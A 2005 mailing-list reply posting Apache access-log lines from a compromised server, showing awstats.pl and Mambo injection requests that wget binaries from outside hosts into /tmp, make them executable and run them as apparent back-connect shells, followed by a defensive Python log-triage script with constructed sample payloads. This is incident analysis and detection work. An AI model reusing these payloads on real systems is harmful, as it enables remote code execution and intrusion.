Re: Am I Compromised -- Some interesting findings
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Steve Kemp on Friday 25 Nov 2005 22:27 wrote:
> Looks like it was downloaded via wget.
>
> Run "grep wget /var/log/apache/access.log" - that should give you the
> IP address of the attacking host.
>
> It might be worth posting any matching lines; that way somebody might
> be able to tell you which script (cgi/php/etc) was used as the attack
> vector.
>
You were right.
Here's the output.
ns1:/var/log/apache2# grep wget access.log
211.20.11.206 - - [23/Nov/2005:03:51:48 -0800]
"GET /awstats/awstats.pl?configdir=
echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|
HTTP/1.1" 404 410 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.20.11.206 - - [23/Nov/2005:03:51:51 -0800]
"GET /cgi-bin/awstats/awstats.pl?configdir=
echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|
HTTP/1.1" 404 418 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.20.11.206 - - [23/Nov/2005:03:51:50 -0800]
"GET /cgi-bin/awstats.pl?configdir=
echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|
HTTP/1.1" 200 770 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
220.194.61.230 - - [23/Nov/2005:06:31:47 -0800]
"GET /awstats/awstats.pl?configdir=
echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|
HTTP/1.1" 404 410 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
220.194.61.230 - - [23/Nov/2005:06:31:48 -0800]
"GET /cgi-bin/awstats.pl?configdir=
echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|
HTTP/1.1" 200 770 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
220.194.61.230 - - [23/Nov/2005:06:31:50 -0800]
"GET /cgi-bin/awstats/awstats.pl?configdir=
echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|
HTTP/1.1" 404 418 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
209.250.116.251 - - [24/Nov/2005:04:32:29 -0800]
"GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://195.120.109.25/cmd.gif?&cmd=cd%20/tmp;wget%20217.160.255.44/cback;chmod%20744%20cback;./cback%20217.160.242.90%208080;echo%20YYY;echo|
HTTP/1.1" 404 402 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
209.250.116.251 - - [24/Nov/2005:04:32:31 -0800]
"GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://195.120.109.25/cmd.gif?&cmd=cd%20/tmp;wget%20217.160.255.44/cback;chmod%20744%20cback;./cback%20217.160.242.90%208080;echo%20YYY;echo|
HTTP/1.1" 200 39940 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1;)"
209.250.116.251 - - [24/Nov/2005:04:32:32 -0800]
"GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://195.120.109.25/cmd.gif?&cmd=cd%20/tmp;wget%20217.160.255.44/cback;chmod%20744%20cback;./cback%20217.160.242.90%208080;echo%20YYY;echo|
HTTP/1.1" 404 408 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
209.250.116.251 - - [24/Nov/2005:04:32:33 -0800]
"GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://195.120.109.25/cmd.gif?&cmd=cd%20/tmp;wget%20217.160.255.44/cback;chmod%20744%20cback;./cback%20217.160.242.90%208080;echo%20YYY;echo|
HTTP/1.1" 404 406 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
84.155.172.142 - - [24/Nov/2005:06:40:06 -0800]
"GET /awstats/awstats.pl?configdir=
echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|
HTTP/1.1" 404 410 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
84.155.172.142 - - [24/Nov/2005:06:40:12 -0800]
"GET /cgi-bin/awstats.pl?configdir=
echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|
HTTP/1.1" 200 770 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
So as I understand it, "awstats.pl" was the software used for the break-in.
I know that there was a DSA issued against awstats, but I got delayed in
updating my server because the other admin had used the awstats package in
a non-standard way.
He had just copied the awstats.pl file to each VirtualHost folder
individually. So even though I had promptly done the DSA update of awstats,
my server wasn't secure because the VirtualHosts were using a vulnerable
version of awstats.
If my understanding is right, it's a good and bitter lesson to learn.
:-(
Thanks for your input.
Regards,
rrs
- --
Ritesh Raj Sarraf
RESEARCHUT -- http://www.researchut.com
Gnupg Key ID: 04F130BC
"Stealing logic from one person is plagiarism, stealing from many is
research."
"Necessity is the mother of invention."
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (GNU/Linux)
iD8DBQFDh0bp4Rhi6gTxMLwRAhwBAJ9nSDOPnU7+hbOCwDQMpfIl7VwXYACePJLn
VmI3Plhrx5JAMqnAVFj9akQ=
=a/Gr
-----END PGP SIGNATURE-----
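The grep Steve suggests finds the lines, but reading them still means URL-decoding each request by hand and working out which probes hit a script that actually exists. The script below is an added example (it is not from this thread or from either poster) that automates that triage: it parses Apache access-log lines, URL-decodes the query string, flags the same kind of web-to-shell patterns seen above (download tool, `cd /tmp`, `chmod`, a remote URL fed to a config path such as Mambo's `mosConfig_absolute_path`), groups hits by source address, and lists the paths that answered 200 to an injection attempt, which is the difference between the `404` probes and the `/cgi-bin/awstats.pl` hits in rrs's log. The log lines embedded in it are constructed for the example and use documentation IP ranges, not the addresses from the thread.

```python
"""Triage Apache access-log lines for web-to-shell command injection probes.
Added example for the thread above; the sample log lines are constructed and
use documentation IP ranges (192.0.2.x, 198.51.100.x, 203.0.113.x).
"""
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Apache common/combined format: client, identd, user, [timestamp], "request", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+)(?: (?P<proto>[^"]*))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Substrings that, after URL-decoding, indicate an attempt to run shell commands
# or pull a remote file through the web application. Extend as needed.
INDICATORS = {
    "download": ("wget ", "curl ", "fetch ", "lwp-download "),
    "tmp_dir": ("cd /tmp", "cd /var/tmp", "cd /dev/shm"),
    "chmod": ("chmod ",),
    "remote_include": ("_path=http://", "_path=ftp://"),
}

# Constructed sample: two awstats.pl probes (one misses, one finds the script),
# one Mambo remote-include probe, and one ordinary request.
SAMPLE_LOG = [
    '192.0.2.55 - - [23/Nov/2005:03:51:48 -0800] "GET /awstats/awstats.pl?configdir=echo;echo%20YYY;cd%20%2ftmp%3bwget%20198.51.100.7%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten;echo%20YYY;echo| HTTP/1.1" 404 410 "-" "Mozilla/4.0"',
    '192.0.2.55 - - [23/Nov/2005:03:51:50 -0800] "GET /cgi-bin/awstats.pl?configdir=echo;echo%20YYY;cd%20%2ftmp%3bwget%20198.51.100.7%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten;echo%20YYY;echo| HTTP/1.1" 200 770 "-" "Mozilla/4.0"',
    '198.51.100.23 - - [24/Nov/2005:04:32:32 -0800] "GET /mambo/index2.php?_REQUEST[option]=com_content&GLOBALS=&mosConfig_absolute_path=http://203.0.113.9/cmd.gif?&cmd=cd%20/tmp;wget%20203.0.113.9/cback;chmod%20744%20cback;./cback HTTP/1.1" 404 408 "-" "Mozilla/4.0"',
    '203.0.113.200 - - [24/Nov/2005:10:00:00 -0800] "GET /index.php?option=com_content&id=1 HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
]


def parse_line(line):
    """Split one log line into fields; returns None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    path, _, query = entry["url"].partition("?")
    entry["path"] = path
    # Decode once so %20 / %3b / %2f become the shell text the attacker meant.
    entry["decoded_query"] = unquote_plus(query)
    return entry


def find_indicators(decoded_query):
    """Return the names of indicator groups present in a decoded query string."""
    return [name for name, needles in INDICATORS.items()
            if any(n in decoded_query for n in needles)]


def analyze(lines):
    """Return {source_ip: [(path, status, [indicator, ...]), ...]} for suspicious requests only."""
    report = defaultdict(list)
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        hits = find_indicators(entry["decoded_query"])
        if hits:
            report[entry["ip"]].append((entry["path"], entry["status"], hits))
    return dict(report)


def likely_reached_script(report):
    """Paths that answered 200 to an injection attempt: the script exists and
    responded, so it is the first place to look. A 404 means the probe missed
    that path. A 200 alone does not prove the payload ran; confirm on the host
    (new files in /tmp, unexpected processes, outbound connections)."""
    return sorted({path for hits in report.values()
                   for path, status, _ in hits if status == 200})


if __name__ == "__main__":
    result = analyze(SAMPLE_LOG)
    for ip, hits in result.items():
        for path, status, names in hits:
            print(f"{ip}  {status}  {path}  {','.join(names)}")
    print("scripts that answered 200:", likely_reached_script(result))
```

Run it against a real log with `analyze(open("/var/log/apache2/access.log").readlines())`; the per-IP grouping reproduces what the thread did by eye (several scanners trying the same payload against three candidate awstats paths), and the 200 list points straight at the copy of the script that was actually reachable.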